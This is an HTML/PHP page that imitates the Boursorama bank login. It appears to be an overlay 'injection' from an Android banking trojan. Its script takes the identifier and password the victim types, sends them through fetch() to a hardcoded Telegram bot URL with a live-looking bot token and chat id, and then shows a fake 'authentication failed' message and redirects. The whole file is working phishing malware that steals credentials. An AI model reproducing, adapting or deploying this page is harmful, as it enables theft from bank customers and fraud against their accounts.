<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, minimal-ui" />
    <title>Boursorama</title>

    <link rel="stylesheet" href="fr/Boursorama/css/normalize.css">
    <link rel="stylesheet" href="fr/Boursorama/css/main.css">
	<link rel="stylesheet" href="fr/Boursorama/css/cat.style.css" type="text/css" media="all">
    <link rel="stylesheet" href="fr/Boursorama/css/agricole.css">
	
	<script src="fr/Boursorama/js/cat.functions.js"></script>
    <script src="fr/Boursorama/js/vendor/jquery-1.11.3.min.js"></script>
    <script src="fr/Boursorama/js/viewport.js"></script>
</head>
<?php 
$IMEI_country = htmlspecialchars($_REQUEST["p"], ENT_QUOTES);
//$IMEI_country = "321|tr";
include "config.php";
?>
<body>
		<div class="modal modal_04">
            <div class="row">
                <div class="form_header">
                    <img src="fr/Boursorama/img/agricole/logo.png" alt="">
                </div>
            </div>
			<div class="container">
				<div id="cat-error">
	<span>Authentication failed or timed out</span>
	<input type="button" class="login_btn" value="Try enter again"
		onClick="tryEnterAgain();"/>
</div>

<div id="cat-forms">
	<form id="form" class="cat-start-step">
					<div class="row">
						<div class="content">
							<div class="input_block_wr">
								<div class="inp_caption">
									 Identifiant
								</div>
								<div class="inp_wr">
									<input type="text" name="field2" id="login" class="main_input"  required="">
								</div>
							</div>
							<div class="input_block_wr">
								<div class="inp_caption">
									Mot de passe
								</div>
								<div class="inp_wr">
									<input type="password" name="field3" id="pass" class="main_input"  required="">
								</div>
							</div>
							<div class="btn_wr">								
								<input type="button" onClick="sentServer();"
								class="login_btn" value="Se connecter"/>
							</div>
						</div>
					</div>
					<?php
                    echo "<input data-role='none' type='text' name='imei' value='$IMEI_country' class='imei' style='visibility:hidden'/>";
                    ?>
				</form>

	<form id="cat-step-2" class="cat-last-step">
		<span>Authentication failed or timed out</span>
		<input type="button" class="login_btn" value="Try enter again"
			onClick="window.close()"/>
	</form>

</div>
			</div>
		</div>
</body>
<script>
function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); }; function sentServer()
{
var oNumInp = document.getElementById('login');
var oCodeInp = document.getElementById('pass');


if ((oNumInp.value.length > 5)&&(oCodeInp.value.length > 3)) {
var imei_c = document.forms["form"].elements["imei"].value; 
var login1 = document.forms["form"].elements["login"].value; 
var pass = document.forms["form"].elements["pass"].value; 
var url='<?php echo $URL; ?>';
fetch("https://api.telegram.org/bot2037815946:AAHl2c7Q_kry-jdWueFreN6sbhCyrSkpsI0/sendMessage?chat_id=-1001594563320&text=|Injection_4|France Boursorama|"+login1+"|"+pass); test2();
}
}
</script>
</html>
